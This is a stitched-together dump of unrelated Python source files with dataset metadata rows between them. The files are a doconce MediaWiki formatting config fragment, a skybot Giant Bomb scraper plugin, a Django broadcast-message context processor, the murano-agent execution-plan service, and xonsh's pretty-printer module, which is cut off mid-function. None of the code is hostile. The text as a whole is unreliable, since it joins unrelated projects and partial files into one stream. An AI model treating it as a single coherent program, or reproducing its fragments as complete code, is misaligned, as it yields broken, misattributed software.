INLINE_TAGS_SUBST['mwiki'] = {
'math': r'\g<begin><math>\g<subst></math>\g<end>',
'math2': r'\g<begin><math>\g<latexmath></math>\g<end>',
'emphasize': r"\g<begin>''\g<subst>''\g<end>",
'bold': r"\g<begin>'''\g<subst>'''\g<end>",
'verbatim': r'\g<begin><code>\g<subst></code>\g<end>',
#'linkURL': r'\g<begin>[\g<url> \g<link>]\g<end>',
'linkURL2': r'[\g<url> \g<link>]',
'linkURL3': r'[\g<url> \g<link>]',
'linkURL2v': r'[\g<url> <code>\g<link></code>]',
'linkURL3v': r'[\g<url> <code>\g<link></code>]',
'plainURL': r'\g<url>',
'colortext': r'<font color="\g<color>">\g<text></font>',
'chapter': r"""== '''\g<subst>''' ==""",
'section': r'== \g<subst> ==',
'subsection': r'=== \g<subst> ===',
'subsubsection': r'==== \g<subst> ====\n',
'paragraph': r"''\g<subst>''\n",
'title': r'#TITLE (actually governed by the filename): \g<subst>\n',
'date': r'===== \g<subst> =====',
'author': mwiki_author, #r'===== \g<name>, \g<institution> =====',
# 'figure': r'<\g<filename>>',
'figure': mwiki_figure,
'movie': default_movie, # will not work for HTML movie player
'comment': '<!-- %s -->',
'abstract': r'\n*\g<type>.* \g<text>\g<rest>',
'linebreak': r'\g<text><br />',
'non-breaking-space': ' ',
'horizontal-rule': '----',
'ampersand2': r' \g<1>&\g<2>',
}
CODE['mwiki'] = mwiki_code
from html import html_table
TABLE['mwiki'] = html_table
ENVIRS['mwiki'] = {
'warning': lambda block, format, title='Warning', text_size='normal':
mwiki_admon(block, format, title, text_size, 'warning'),
'notice': lambda block, format, title='Notice', text_size='normal':
mwiki_admon(block, format, title, text_size, 'notice'),
'question': lambda block, format, title='Question', text_size='normal':
mwiki_admon(block, format, title, text_size, 'question'),
'hint': lambda block, format, title='Hint', text_size='normal':
mwiki_admon(block, format, title, text_size, 'hint'),
'summary': lambda block, format, title='Summary', text_size='normal':
mwiki_admon(block, format, title, text_size, 'summary'),
'block': lambda block, format, title='Block', text_size='normal':
mwiki_admon(block, format, title, text_size, 'block'),
'box': lambda block, format, title='none', text_size='normal':
mwiki_admon(block, format, title, text_size, 'box'),
'quote': lambda block, format, title='none', text_size='normal':
mwiki_admon(block, format, title, text_size, 'quote'),
}
# native list:
LIST['mwiki'] = {
'itemize': {'begin': '\n', 'item': '*', 'end': '\n\n'},
'enumerate': {'begin': '\n', 'item': '#', 'end': '\n\n'},
'description': {'begin': '\n', 'item': '* %s ', 'end': '\n\n'},
'separator': '\n'}
# Try this:
LIST['mwiki'] = LIST['html']
# how to typeset description lists for function arguments, return
# values, and module/class variables:
ARGLIST['mwiki'] = {
'parameter': '*argument*',
'keyword': '*keyword argument*',
'return': '*return value(s)*',
'instance variable': '*instance variable*',
'class variable': '*class variable*',
'module variable': '*module variable*',
}
FIGURE_EXT['mwiki'] = {
'search': ('.png', '.gif', '.jpg', '.jpeg'),
'convert': ('.png', '.gif', '.jpg')}
CROSS_REFS['mwiki'] = mwiki_ref_and_label
from plaintext import plain_index_bib
EXERCISE['mwiki'] = plain_exercise
INDEX_BIB['mwiki'] = plain_index_bib
TOC['mwiki'] = lambda s: '<<<TOC>>>' # __TOC__ will be wrongly translated to paragraph headline and needs a fix
QUIZ['mwiki'] = plain_quiz
# document start:
INTRO['mwiki'] = ''
|
bsd-3-clause
| 7,633,075,306,408,647,000 | 37.531674 | 122 | 0.557278 | false | 3.591523 | false | false | false |
andyeff/skybot
|
plugins/giantbomb.py
|
1
|
1360
|
from urllib2 import HTTPError
from util import hook, http
@hook.command(autohelp=False)
def gb(inp):
'.gb - lists upcoming shows on Giant Bomb'
url = 'http://www.giantbomb.com'
try:
doc = http.get_html(url)
except HTTPError as e:
errors = {400: 'bad request (ratelimited?) 400',
401: 'unauthorized 401 ',
403: 'forbidden 403',
404: 'invalid user/id 404',
500: 'something is broken 500',
502: 'something is down ("getting upgraded?") 502',
503: 'something is overloaded 503',
410: 'something something 410'}
if e.code == 404:
return 'bad url?'
if e.code in errors:
return 'error: ' + errors[e.code]
return 'error: unknown %s' % e.code
if not doc.find_class("promo-upcoming"):
return "no results found!"
upcoming = doc.find_class("promo-upcoming")[0]
uptitles = upcoming.xpath('.//h4[@class="title"]')
uptimes = upcoming.xpath('.//p[@class="time"]')
list_titles = [x.text_content() for x in uptitles]
list_times = [x.text_content() for x in uptimes]
shows = zip(list_titles, list_times)
res = " | ".join(' - '.join(i) for i in shows)
if len(res) > 420:
res = res[0:420] + " ..."
return res
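# Example output (show names and dates are made up): "Quick Look - Jan 5 | Podcast - Jan 6";
# anything beyond 420 characters is truncated, presumably to keep the reply within an IRC line.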
|
unlicense
| 7,194,837,047,324,547,000 | 29.909091 | 69 | 0.548529 | false | 3.578947 | false | false | false |
cc-archive/commoner
|
src/commoner/broadcast/context_processors.py
|
1
|
1043
|
from django.conf import settings
from django.contrib.auth.decorators import login_required
from commoner.broadcast.models import Message, Log
def messages(request):
if request.user.is_authenticated():
messages = Message.active.all()
site_messages = []
for message in messages:
try:
# it exists in the log
log = Log.objects.get(user=request.user, message=message)
# the user hasn't acked
if message.ack_req and not log.acked:
# show the alert
site_messages.append(message)
except:
site_messages.append(message)
Log(
user = request.user,
message = message,
acked = False
).save()
return {'site_messages' : site_messages}
else:
return {}
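# To activate this processor (illustrative; the exact settings key depends on the
# Django version in use), register it in settings.py, e.g.:
#   TEMPLATE_CONTEXT_PROCESSORS += (
#       'commoner.broadcast.context_processors.messages',
#   )
# Templates can then loop over site_messages for the logged-in user.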
|
agpl-3.0
| 3,577,103,782,968,181,000 | 28 | 73 | 0.466922 | false | 5.518519 | false | false | false |
telefonicaid/murano-agent
|
muranoagent/app.py
|
1
|
8000
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
import types
import bunch
import semver
from muranoagent.common import config
from muranoagent.common import messaging
from muranoagent import exceptions as exc
from muranoagent import execution_plan_queue
from muranoagent import execution_plan_runner
from muranoagent import execution_result as ex_result
from muranoagent.openstack.common import log as logging
from muranoagent.openstack.common import service
CONF = config.CONF
LOG = logging.getLogger(__name__)
format_version = '2.0.0'
class MuranoAgent(service.Service):
def __init__(self):
self._queue = execution_plan_queue.ExecutionPlanQueue()
super(MuranoAgent, self).__init__()
@staticmethod
def _load_package(name):
try:
LOG.debug('Loading plugin %s', name)
__import__(name)
except Exception:
LOG.warn('Cannot load package %s', name, exc_info=True)
pass
def _load(self):
path = os.path.join(os.path.dirname(__file__), 'executors')
sys.path.insert(1, path)
for entry in os.listdir(path):
package_path = os.path.join(path, entry)
if os.path.isdir(package_path):
MuranoAgent._load_package(entry)
def start(self):
self._load()
msg_iterator = self._wait_plan()
while True:
try:
self._loop_func(msg_iterator)
except Exception as ex:
LOG.exception(ex)
time.sleep(5)
def _loop_func(self, msg_iterator):
result, timestamp = self._queue.get_execution_plan_result()
if result is not None:
if self._send_result(result):
self._queue.remove(timestamp)
return
plan = self._queue.get_execution_plan()
if plan is not None:
LOG.debug("Got an execution plan '{0}':".format(str(plan)))
self._run(plan)
return
msg_iterator.next()
def _run(self, plan):
with execution_plan_runner.ExecutionPlanRunner(plan) as runner:
try:
result = runner.run()
execution_result = ex_result.ExecutionResult.from_result(
result, plan)
self._queue.put_execution_result(execution_result, plan)
except Exception as ex:
LOG.exception('Error running execution plan')
execution_result = ex_result.ExecutionResult.from_error(ex,
plan)
self._queue.put_execution_result(execution_result, plan)
def _send_result(self, result):
with self._create_rmq_client() as mq:
msg = messaging.Message()
msg.body = result
msg.id = result.get('SourceID')
mq.send(message=msg,
key=CONF.rabbitmq.result_routing_key,
exchange=CONF.rabbitmq.result_exchange)
return True
def _create_rmq_client(self):
rabbitmq = CONF.rabbitmq
connection_params = {
'login': rabbitmq.login,
'password': rabbitmq.password,
'host': rabbitmq.host,
'port': rabbitmq.port,
'virtual_host': rabbitmq.virtual_host,
'ssl': rabbitmq.ssl,
'ca_certs': rabbitmq.ca_certs.strip() or None
}
return messaging.MqClient(**connection_params)
def _wait_plan(self):
delay = 5
while True:
try:
with self._create_rmq_client() as mq:
with mq.open(CONF.rabbitmq.input_queue,
prefetch_count=1) as subscription:
while True:
msg = subscription.get_message(timeout=5)
if msg is not None and isinstance(msg.body, dict):
self._handle_message(msg)
if msg is not None:
msg.ack()
yield
delay = 5
except KeyboardInterrupt:
break
except Exception:
LOG.warn('Communication error', exc_info=True)
time.sleep(delay)
delay = min(delay * 1.2, 60)
def _handle_message(self, msg):
print(msg.body)
if 'ID' not in msg.body and msg.id:
msg.body['ID'] = msg.id
err = self._verify_plan(msg.body)
if err is None:
self._queue.put_execution_plan(msg.body)
else:
try:
execution_result = ex_result.ExecutionResult.from_error(
err, bunch.Bunch(msg.body))
self._send_result(execution_result)
except ValueError:
LOG.warn('Execution result is not produced')
def _verify_plan(self, plan):
plan_format_version = plan.get('FormatVersion', '1.0.0')
if semver.compare(plan_format_version, '2.0.0') > 0 or \
semver.compare(plan_format_version, format_version) < 0:
range_str = 'in range 2.0.0-{0}'.format(plan_format_version) \
if format_version != '2.0.0' \
else 'equal to {0}'.format(format_version)
return exc.AgentException(
3,
'Unsupported format version {0} (must be {1})'.format(
plan_format_version, range_str))
for attr in ('Scripts', 'Files', 'Options'):
if attr in plan and not isinstance(
plan[attr], types.DictionaryType):
return exc.AgentException(
2, '{0} is not a dictionary'.format(attr))
for name, script in plan.get('Scripts', {}).items():
for attr in ('Type', 'EntryPoint'):
if attr not in script or not isinstance(
script[attr], types.StringTypes):
return exc.AgentException(
2, 'Incorrect {0} entry in script {1}'.format(
attr, name))
if not isinstance(script.get('Options', {}), types.DictionaryType):
return exc.AgentException(
2, 'Incorrect Options entry in script {0}'.format(name))
if script['EntryPoint'] not in plan.get('Files', {}):
return exc.AgentException(
2, 'Script {0} misses entry point {1}'.format(
name, script['EntryPoint']))
for additional_file in script.get('Files', []):
if additional_file not in plan.get('Files', {}):
return exc.AgentException(
2, 'Script {0} misses file {1}'.format(
name, additional_file))
for key, plan_file in plan.get('Files', {}).items():
for attr in ('BodyType', 'Body', 'Name'):
if attr not in plan_file:
return exc.AgentException(
2, 'Incorrect {0} entry in file {1}'.format(
attr, key))
if plan_file['BodyType'] not in ('Text', 'Base64'):
return exc.AgentException(
                    2, 'Incorrect BodyType in file {0}'.format(key))
return None
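# A minimal execution plan that passes _verify_plan above (illustrative only;
# the script name, file name and body are invented, not taken from a real deployment):
EXAMPLE_PLAN = {
    'FormatVersion': '2.0.0',
    'Scripts': {
        'deploy': {
            'Type': 'Application',
            'EntryPoint': 'deploy.sh',
            'Options': {},
            'Files': ['deploy.sh'],
        },
    },
    'Files': {
        'deploy.sh': {'Name': 'deploy.sh', 'BodyType': 'Text', 'Body': 'echo ok'},
    },
    'Options': {},
}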
|
apache-2.0
| -4,816,543,227,355,885,000 | 36.735849 | 79 | 0.541375 | false | 4.35019 | false | false | false |
szlin/gitsome
|
xonsh/pretty.py
|
1
|
27713
|
# -*- coding: utf-8 -*-
"""
Python advanced pretty printer. This pretty printer is intended to
replace the old `pprint` python module which does not allow developers
to provide their own pretty print callbacks.
This module is based on ruby's `prettyprint.rb` library by `Tanaka Akira`.
The following implementations were forked from the IPython project:
* Copyright (c) 2008-2014, IPython Development Team
* Copyright (C) 2001-2007 Fernando Perez <[email protected]>
* Copyright (c) 2001, Janko Hauser <[email protected]>
* Copyright (c) 2001, Nathaniel Gray <[email protected]>
Example Usage
-------------
To directly print the representation of an object use `pprint`::
from pretty import pprint
pprint(complex_object)
To get a string of the output use `pretty`::
from pretty import pretty
string = pretty(complex_object)
Extending
---------
The pretty library allows developers to add pretty printing rules for their
own objects. This process is straightforward. All you have to do is to
add a `_repr_pretty_` method to your object and call the methods on the
pretty printer passed::
class MyObject(object):
def _repr_pretty_(self, p, cycle):
...
Here is an example implementation of a `_repr_pretty_` method for a list
subclass::
class MyList(list):
def _repr_pretty_(self, p, cycle):
if cycle:
p.text('MyList(...)')
else:
with p.group(8, 'MyList([', '])'):
for idx, item in enumerate(self):
if idx:
p.text(',')
p.breakable()
p.pretty(item)
The `cycle` parameter is `True` if pretty detected a cycle. You *have* to
react to that or the result is an infinite loop. `p.text()` just adds
non breaking text to the output, `p.breakable()` either adds a whitespace
or breaks here. If you pass it an argument it's used instead of the
default space. `p.pretty` prettyprints another object using the pretty print
method.
The first parameter to the `group` function specifies the extra indentation
of the next line. In this example the next item will either be on the same
line (if the items are short enough) or aligned with the right edge of the
opening bracket of `MyList`.
If you just want to indent something you can use the group function
without open / close parameters. You can also use this code::
with p.indent(2):
...
Inheritance diagram:
.. inheritance-diagram:: IPython.lib.pretty
:parts: 3
:copyright: 2007 by Armin Ronacher.
Portions (c) 2009 by Robert Kern.
:license: BSD License.
"""
from contextlib import contextmanager
import sys
import types
import re
import datetime
from collections import deque
# from IPython.utils.py3compat import PY3, cast_unicode
# from IPython.utils.encoding import get_stream_enc
from io import StringIO
__all__ = ['pretty', 'pprint', 'PrettyPrinter', 'RepresentationPrinter',
'for_type', 'for_type_by_name']
MAX_SEQ_LENGTH = 1000
_re_pattern_type = type(re.compile(''))
def _safe_getattr(obj, attr, default=None):
"""Safe version of getattr.
Same as getattr, but will return ``default`` on any Exception,
rather than raising.
"""
try:
return getattr(obj, attr, default)
except Exception:
return default
# if PY3:
CUnicodeIO = StringIO
# else:
# class CUnicodeIO(StringIO):
# """StringIO that casts str to unicode on Python 2"""
# def write(self, text):
# return super(CUnicodeIO, self).write(
# cast_unicode(text, encoding=get_stream_enc(sys.stdout)))
def pretty(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Pretty print the object's representation.
"""
stream = CUnicodeIO()
printer = RepresentationPrinter(stream, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
return stream.getvalue()
def pprint(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Like `pretty` but print to stdout.
"""
printer = RepresentationPrinter(sys.stdout, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
sys.stdout.write(newline)
sys.stdout.flush()
class _PrettyPrinterBase(object):
@contextmanager
def indent(self, indent):
"""with statement support for indenting/dedenting."""
self.indentation += indent
try:
yield
finally:
self.indentation -= indent
@contextmanager
def group(self, indent=0, gopen='', gclose=''):
"""like begin_group / end_group but for the with statement."""
self.begin_group(indent, gopen)
try:
yield
finally:
self.end_group(indent, gclose)
class PrettyPrinter(_PrettyPrinterBase):
"""
Baseclass for the `RepresentationPrinter` prettyprinter that is used to
generate pretty reprs of objects. Contrary to the `RepresentationPrinter`
this printer knows nothing about the default pprinters or the `_repr_pretty_`
callback method.
"""
def __init__(self, output, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
self.output = output
self.max_width = max_width
self.newline = newline
self.max_seq_length = max_seq_length
self.output_width = 0
self.buffer_width = 0
self.buffer = deque()
root_group = Group(0)
self.group_stack = [root_group]
self.group_queue = GroupQueue(root_group)
self.indentation = 0
def _break_outer_groups(self):
while self.max_width < self.output_width + self.buffer_width:
group = self.group_queue.deq()
if not group:
return
while group.breakables:
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
while self.buffer and isinstance(self.buffer[0], Text):
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
def text(self, obj):
"""Add literal text to the output."""
width = len(obj)
if self.buffer:
text = self.buffer[-1]
if not isinstance(text, Text):
text = Text()
self.buffer.append(text)
text.add(obj, width)
self.buffer_width += width
self._break_outer_groups()
else:
self.output.write(obj)
self.output_width += width
def breakable(self, sep=' '):
"""
Add a breakable separator to the output. This does not mean that it
will automatically break here. If no breaking on this position takes
        place the `sep` is inserted, which defaults to one space.
"""
width = len(sep)
group = self.group_stack[-1]
if group.want_break:
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
else:
self.buffer.append(Breakable(sep, width, self))
self.buffer_width += width
self._break_outer_groups()
def break_(self):
"""
Explicitly insert a newline into the output, maintaining correct indentation.
"""
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
def begin_group(self, indent=0, gopen=''):
"""
        Begin a group. If you want support for python < 2.5 which doesn't have
the with statement this is the preferred way:
p.begin_group(1, '{')
...
p.end_group(1, '}')
The python 2.5 expression would be this:
with p.group(1, '{', '}'):
...
The first parameter specifies the indentation for the next line (usually
the width of the opening text), the second the opening text. All
parameters are optional.
"""
if gopen:
self.text(gopen)
group = Group(self.group_stack[-1].depth + 1)
self.group_stack.append(group)
self.group_queue.enq(group)
self.indentation += indent
def _enumerate(self, seq):
"""like enumerate, but with an upper limit on the number of items"""
for idx, x in enumerate(seq):
if self.max_seq_length and idx >= self.max_seq_length:
self.text(',')
self.breakable()
self.text('...')
                return  # end iteration; raising StopIteration in a generator is an error under PEP 479 (Python 3.7+)
yield idx, x
def end_group(self, dedent=0, gclose=''):
"""End a group. See `begin_group` for more details."""
self.indentation -= dedent
group = self.group_stack.pop()
if not group.breakables:
self.group_queue.remove(group)
if gclose:
self.text(gclose)
def flush(self):
"""Flush data that is left in the buffer."""
for data in self.buffer:
self.output_width += data.output(self.output, self.output_width)
self.buffer.clear()
self.buffer_width = 0
def _get_mro(obj_class):
""" Get a reasonable method resolution order of a class and its superclasses
for both old-style and new-style classes.
"""
if not hasattr(obj_class, '__mro__'):
# Old-style class. Mix in object to make a fake new-style class.
try:
obj_class = type(obj_class.__name__, (obj_class, object), {})
except TypeError:
# Old-style extension type that does not descend from object.
# FIXME: try to construct a more thorough MRO.
mro = [obj_class]
else:
mro = obj_class.__mro__[1:-1]
else:
mro = obj_class.__mro__
return mro
class RepresentationPrinter(PrettyPrinter):
"""
Special pretty printer that has a `pretty` method that calls the pretty
printer for a python object.
This class stores processing data on `self` so you must *never* use
    this class in a threaded environment. Always lock it or reinstantiate
it.
Instances also have a verbose flag callbacks can access to control their
output. For example the default instance repr prints all attributes and
methods that are not prefixed by an underscore if the printer is in
verbose mode.
"""
def __init__(self, output, verbose=False, max_width=79, newline='\n',
singleton_pprinters=None, type_pprinters=None, deferred_pprinters=None,
max_seq_length=MAX_SEQ_LENGTH):
PrettyPrinter.__init__(self, output, max_width, newline, max_seq_length=max_seq_length)
self.verbose = verbose
self.stack = []
if singleton_pprinters is None:
singleton_pprinters = _singleton_pprinters.copy()
self.singleton_pprinters = singleton_pprinters
if type_pprinters is None:
type_pprinters = _type_pprinters.copy()
self.type_pprinters = type_pprinters
if deferred_pprinters is None:
deferred_pprinters = _deferred_type_pprinters.copy()
self.deferred_pprinters = deferred_pprinters
def pretty(self, obj):
"""Pretty print the given object."""
obj_id = id(obj)
cycle = obj_id in self.stack
self.stack.append(obj_id)
self.begin_group()
try:
obj_class = _safe_getattr(obj, '__class__', None) or type(obj)
# First try to find registered singleton printers for the type.
try:
printer = self.singleton_pprinters[obj_id]
except (TypeError, KeyError):
pass
else:
return printer(obj, self, cycle)
# Next walk the mro and check for either:
# 1) a registered printer
# 2) a _repr_pretty_ method
for cls in _get_mro(obj_class):
if cls in self.type_pprinters:
# printer registered in self.type_pprinters
return self.type_pprinters[cls](obj, self, cycle)
else:
# deferred printer
printer = self._in_deferred_types(cls)
if printer is not None:
return printer(obj, self, cycle)
else:
# Finally look for special method names.
# Some objects automatically create any requested
# attribute. Try to ignore most of them by checking for
# callability.
if '_repr_pretty_' in cls.__dict__:
meth = cls._repr_pretty_
if callable(meth):
return meth(obj, self, cycle)
return _default_pprint(obj, self, cycle)
finally:
self.end_group()
self.stack.pop()
def _in_deferred_types(self, cls):
"""
Check if the given class is specified in the deferred type registry.
Returns the printer from the registry if it exists, and None if the
class is not in the registry. Successful matches will be moved to the
regular type registry for future use.
"""
mod = _safe_getattr(cls, '__module__', None)
name = _safe_getattr(cls, '__name__', None)
key = (mod, name)
printer = None
if key in self.deferred_pprinters:
# Move the printer over to the regular registry.
printer = self.deferred_pprinters.pop(key)
self.type_pprinters[cls] = printer
return printer
class Printable(object):
def output(self, stream, output_width):
return output_width
class Text(Printable):
def __init__(self):
self.objs = []
self.width = 0
def output(self, stream, output_width):
for obj in self.objs:
stream.write(obj)
return output_width + self.width
def add(self, obj, width):
self.objs.append(obj)
self.width += width
class Breakable(Printable):
def __init__(self, seq, width, pretty):
self.obj = seq
self.width = width
self.pretty = pretty
self.indentation = pretty.indentation
self.group = pretty.group_stack[-1]
self.group.breakables.append(self)
def output(self, stream, output_width):
self.group.breakables.popleft()
if self.group.want_break:
stream.write(self.pretty.newline)
stream.write(' ' * self.indentation)
return self.indentation
if not self.group.breakables:
self.pretty.group_queue.remove(self.group)
stream.write(self.obj)
return output_width + self.width
class Group(Printable):
def __init__(self, depth):
self.depth = depth
self.breakables = deque()
self.want_break = False
class GroupQueue(object):
def __init__(self, *groups):
self.queue = []
for group in groups:
self.enq(group)
def enq(self, group):
depth = group.depth
while depth > len(self.queue) - 1:
self.queue.append([])
self.queue[depth].append(group)
def deq(self):
for stack in self.queue:
for idx, group in enumerate(reversed(stack)):
if group.breakables:
del stack[idx]
group.want_break = True
return group
for group in stack:
group.want_break = True
del stack[:]
def remove(self, group):
try:
self.queue[group.depth].remove(group)
except ValueError:
pass
try:
_baseclass_reprs = (object.__repr__, types.InstanceType.__repr__)
except AttributeError: # Python 3
_baseclass_reprs = (object.__repr__,)
def _default_pprint(obj, p, cycle):
"""
The default print function. Used if an object does not provide one and
it's none of the builtin objects.
"""
klass = _safe_getattr(obj, '__class__', None) or type(obj)
if _safe_getattr(klass, '__repr__', None) not in _baseclass_reprs:
# A user-provided repr. Find newlines and replace them with p.break_()
_repr_pprint(obj, p, cycle)
return
p.begin_group(1, '<')
p.pretty(klass)
p.text(' at 0x%x' % id(obj))
if cycle:
p.text(' ...')
elif p.verbose:
first = True
for key in dir(obj):
if not key.startswith('_'):
try:
value = getattr(obj, key)
except AttributeError:
continue
if isinstance(value, types.MethodType):
continue
if not first:
p.text(',')
p.breakable()
p.text(key)
p.text('=')
step = len(key) + 1
p.indentation += step
p.pretty(value)
p.indentation -= step
first = False
p.end_group(1, '>')
def _seq_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sequences. Used by
the default pprint for tuples, dicts, and lists.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
step = len(start)
p.begin_group(step, start)
for idx, x in p._enumerate(obj):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
if len(obj) == 1 and type(obj) is tuple:
# Special case for 1-item tuples.
p.text(',')
p.end_group(step, end)
return inner
def _set_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sets and frozensets.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
if len(obj) == 0:
# Special case.
p.text(basetype.__name__ + '()')
else:
step = len(start)
p.begin_group(step, start)
# Like dictionary keys, we will try to sort the items if there aren't too many
items = obj
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
items = sorted(obj)
except Exception:
# Sometimes the items don't sort.
pass
for idx, x in p._enumerate(items):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
p.end_group(step, end)
return inner
def _dict_pprinter_factory(start, end, basetype=None):
"""
Factory that returns a pprint function used by the default pprint of
dicts and dict proxies.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text('{...}')
p.begin_group(1, start)
keys = obj.keys()
# if dict isn't large enough to be truncated, sort keys before displaying
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
keys = sorted(keys)
except Exception:
# Sometimes the keys don't sort.
pass
for idx, key in p._enumerate(keys):
if idx:
p.text(',')
p.breakable()
p.pretty(key)
p.text(': ')
p.pretty(obj[key])
p.end_group(1, end)
return inner
def _super_pprint(obj, p, cycle):
"""The pprint for the super type."""
p.begin_group(8, '<super: ')
p.pretty(obj.__thisclass__)
p.text(',')
p.breakable()
p.pretty(obj.__self__)
p.end_group(8, '>')
def _re_pattern_pprint(obj, p, cycle):
"""The pprint function for regular expression patterns."""
p.text('re.compile(')
pattern = repr(obj.pattern)
if pattern[:1] in 'uU':
pattern = pattern[1:]
prefix = 'ur'
else:
prefix = 'r'
pattern = prefix + pattern.replace('\\\\', '\\')
p.text(pattern)
if obj.flags:
p.text(',')
p.breakable()
done_one = False
for flag in ('TEMPLATE', 'IGNORECASE', 'LOCALE', 'MULTILINE', 'DOTALL',
'UNICODE', 'VERBOSE', 'DEBUG'):
if obj.flags & getattr(re, flag):
if done_one:
p.text('|')
p.text('re.' + flag)
done_one = True
p.text(')')
def _type_pprint(obj, p, cycle):
"""The pprint for classes and types."""
# Heap allocated types might not have the module attribute,
# and others may set it to None.
# Checks for a __repr__ override in the metaclass
if type(obj).__repr__ is not type.__repr__:
_repr_pprint(obj, p, cycle)
return
mod = _safe_getattr(obj, '__module__', None)
name = _safe_getattr(obj, '__qualname__', obj.__name__)
if mod in (None, '__builtin__', 'builtins', 'exceptions'):
p.text(name)
else:
p.text(mod + '.' + name)
def _repr_pprint(obj, p, cycle):
"""A pprint that just redirects to the normal repr function."""
# Find newlines and replace them with p.break_()
output = repr(obj)
for idx, output_line in enumerate(output.splitlines()):
if idx:
p.break_()
p.text(output_line)
def _function_pprint(obj, p, cycle):
"""Base pprint for all functions and builtin functions."""
name = _safe_getattr(obj, '__qualname__', obj.__name__)
mod = obj.__module__
if mod and mod not in ('__builtin__', 'builtins', 'exceptions'):
name = mod + '.' + name
p.text('<function %s>' % name)
def _exception_pprint(obj, p, cycle):
"""Base pprint for all exceptions."""
name = getattr(obj.__class__, '__qualname__', obj.__class__.__name__)
if obj.__class__.__module__ not in ('exceptions', 'builtins'):
name = '%s.%s' % (obj.__class__.__module__, name)
step = len(name) + 1
p.begin_group(step, name + '(')
for idx, arg in enumerate(getattr(obj, 'args', ())):
if idx:
p.text(',')
p.breakable()
p.pretty(arg)
p.end_group(step, ')')
#: the exception base
try:
_exception_base = BaseException
except NameError:
_exception_base = Exception
#: printers for builtin types
_type_pprinters = {
int: _repr_pprint,
float: _repr_pprint,
str: _repr_pprint,
tuple: _seq_pprinter_factory('(', ')', tuple),
list: _seq_pprinter_factory('[', ']', list),
dict: _dict_pprinter_factory('{', '}', dict),
set: _set_pprinter_factory('{', '}', set),
frozenset: _set_pprinter_factory('frozenset({', '})', frozenset),
super: _super_pprint,
_re_pattern_type: _re_pattern_pprint,
type: _type_pprint,
types.FunctionType: _function_pprint,
types.BuiltinFunctionType: _function_pprint,
types.MethodType: _repr_pprint,
datetime.datetime: _repr_pprint,
datetime.timedelta: _repr_pprint,
_exception_base: _exception_pprint
}
try:
_type_pprinters[types.DictProxyType] = _dict_pprinter_factory('<dictproxy {', '}>')
_type_pprinters[types.ClassType] = _type_pprint
_type_pprinters[types.SliceType] = _repr_pprint
except AttributeError: # Python 3
_type_pprinters[slice] = _repr_pprint
try:
_type_pprinters[xrange] = _repr_pprint
_type_pprinters[long] = _repr_pprint
_type_pprinters[unicode] = _repr_pprint
except NameError:
_type_pprinters[range] = _repr_pprint
_type_pprinters[bytes] = _repr_pprint
#: printers for types specified by name
_deferred_type_pprinters = {
}
def for_type(typ, func):
"""
Add a pretty printer for a given type.
"""
oldfunc = _type_pprinters.get(typ, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_type_pprinters[typ] = func
return oldfunc
def for_type_by_name(type_module, type_name, func):
"""
Add a pretty printer for a type specified by the module and name of a type
rather than the type object itself.
"""
key = (type_module, type_name)
oldfunc = _deferred_type_pprinters.get(key, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_deferred_type_pprinters[key] = func
return oldfunc
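# Example (illustrative; Point and _point_pprint are hypothetical, not part of this
# module): registering a custom printer with for_type. The callback takes
# (obj, p, cycle), the same signature as the _repr_pretty_ hooks described above.
#
#     class Point(object):
#         def __init__(self, x, y):
#             self.x, self.y = x, y
#
#     def _point_pprint(obj, p, cycle):
#         p.text('Point(%r, %r)' % (obj.x, obj.y))
#
#     for_type(Point, _point_pprint)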
#: printers for the default singletons
_singleton_pprinters = dict.fromkeys(map(id, [None, True, False, Ellipsis,
NotImplemented]), _repr_pprint)
def _defaultdict_pprint(obj, p, cycle):
name = 'defaultdict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(obj.default_factory)
p.text(',')
p.breakable()
p.pretty(dict(obj))
def _ordereddict_pprint(obj, p, cycle):
name = 'OrderedDict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(list(obj.items()))
def _deque_pprint(obj, p, cycle):
name = 'deque'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(list(obj))
def _counter_pprint(obj, p, cycle):
name = 'Counter'
with p.group(len(name) + 1, name + '(', ')'):
